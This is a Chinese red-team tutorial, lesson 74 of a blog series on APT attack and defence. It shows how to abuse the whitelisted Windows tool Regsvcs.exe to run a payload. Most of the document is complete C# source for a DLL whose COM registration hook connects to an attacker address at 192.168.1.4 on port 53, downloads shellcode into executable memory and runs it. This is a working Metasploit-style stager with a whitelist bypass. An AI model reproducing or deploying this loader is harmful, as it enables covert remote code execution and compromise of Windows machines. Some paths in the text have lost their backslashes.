第七十四課:基于白名單Regsvcs.exe執(zhí)行payload第四季
專(zhuān)注APT攻擊與防御
https://micropoor.blogspot.com/
Regsvcs簡(jiǎn)介:
Regsvcs為.NET服務(wù)安裝工具,主要提供三類(lèi)服務(wù):
1. 加載并注冊(cè)程序集。
2. 生成、注冊(cè)類(lèi)型庫(kù)并將其安裝到指定的 COM+ 1.0 應(yīng)用程序中。
3. 配置以編程方式添加到類(lèi)的服務(wù)。
說(shuō)明:Regsvcs.exe所在路徑?jīng)]有被系統(tǒng)添加PATH環(huán)境變量中,因此,Regsvcs命令無(wú)法識(shí)別。
具體參考微軟官方文檔:
https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool
基于白名單Regsvcs.exe配置payload:
Windows 7 默認(rèn)位置:
C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe
攻擊機(jī):192.168.1.4 Debian
靶機(jī): 192.168.1.3 Windows 7
配置攻擊機(jī)msf:
靶機(jī)執(zhí)行:
1 C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe Micropoor.dll
附錄:Micropoor.cs
注:x86 payload
1 using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;
2 namespace phwUqeuTRSqn
3 {
4 public class mfBxqerbXgh : ServicedComponent {
5
6 public mfBxqerbXgh() { Console.WriteLine("Micropoor"); }
7
8 [ComRegisterFunction]
9 public static void RegisterClass ( string DssjWsFMnwwXL )
10 {
11 uXsiCEXRzLNkI.BBNSohgZXGCaD();
12 }
13
14 [ComUnregisterFunction]
15 public static void UnRegisterClass ( string DssjWsFMnwwXL )
16 {
17 uXsiCEXRzLNkI.BBNSohgZXGCaD();
18 }
19 }
20
21 public class uXsiCEXRzLNkI
22 { [DllImport("kernel32")] private static extern UInt32 HeapCreate(UInt32 pAyHWx, UInt32 KXNJUcPIUymFNbJ, UInt32 MotkftcMAIJRnW);
23 [DllImport("kernel32")] private static extern UInt32 HeapAlloc(UInt32yjmmncJHBrUu, UInt32 MYjktCDxYrlTs, UInt32 zyBAwQVBQbi);
24 [DllImport("kernel32")] private static extern UInt32 RtlMoveMemory(UInt32 PorEiXBhZkA, byte[] UIkcqF, UInt32 wAXQEPCIVJQQb);
25 [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 WNvQyYv, UInt32 vePRog, UInt32 Bwxjth, IntPtr ExkSdsTdwD, UInt32 KfNaMFOJVTSxbrR, ref UInt32 QEuyYka);
26 [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pzymHg, UInt32 lReJrqjtOqvkXk);static byte[] SVMBrK(string MKwSjIxqTxxEO, int jVaXWRxcmw) {
27 IPEndPoint hqbNYMZQr = new IPEndPoint(IPAddress.Parse(MKwSjIxqTxxEO),jVaXWRxcmw);
28 Socket LbLgipot = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
29 try { LbLgipot.Connect(hqbNYMZQr); }
30 catch { return null;}
31 byte[] VKQsLPgLmVdp = new byte[4];
32 LbLgipot.Receive(VKQsLPgLmVdp, 4, 0);
33 int jbQtneZFbvzK = BitConverter.ToInt32(VKQsLPgLmVdp, 0);
34 byte[] cyDiPLJhiAQbw = new byte[jbQtneZFbvzK + 5];
35 int vyPloXEDJoylLbj = 0;
36 while (vyPloXEDJoylLbj < jbQtneZFbvzK)
37 { vyPloXEDJoylLbj += LbLgipot.Receive(cyDiPLJhiAQbw, vyPloXEDJoylLbj+ 5, (jbQtneZFbvzK ‐ vyPloXEDJoylLbj) < 4096 ? (jbQtneZFbvzK ‐ vyPloXEDJoylLbj) : 4096, 0);}
38 byte[] MkHUcy = BitConverter.GetBytes((int)LbLgipot.Handle);
39 Array.Copy(MkHUcy, 0, cyDiPLJhiAQbw, 1, 4); cyDiPLJhiAQbw[0] = 0xBF;
40 return cyDiPLJhiAQbw;}
41 static void ZFeAPdN(byte[] hjErkNfmkyBq) {
42 if (hjErkNfmkyBq != null) {
43 UInt32 xYfliOUgksPsv = HeapCreate(0x00040000, (UInt32)hjErkNfmkyBq.Length, 0);
44 UInt32 eSiulXLtqQO = HeapAlloc(xYfliOUgksPsv, 0x00000008, (UInt32)hjErkNfmkyBq.Length);
45 RtlMoveMemory(eSiulXLtqQO, hjErkNfmkyBq,(UInt32)hjErkNfmkyBq.Length);
46 UInt32 NByrFgKjVjB = 0;
47 IntPtr PsIqQCvc = CreateThread(0, 0, eSiulXLtqQO, IntPtr.Zero, 0, refNByrFgKjVjB);
48 WaitForSingleObject(PsIqQCvc, 0xFFFFFFFF);}}
49
50 public static void BBNSohgZXGCaD() {
51 byte[] cyDiPLJhiAQbw = null; cyDiPLJhiAQbw = SVMBrK("192.168.1.4",
53);
52 ZFeAPdN(cyDiPLJhiAQbw);
53 } } }
Micropoor
?
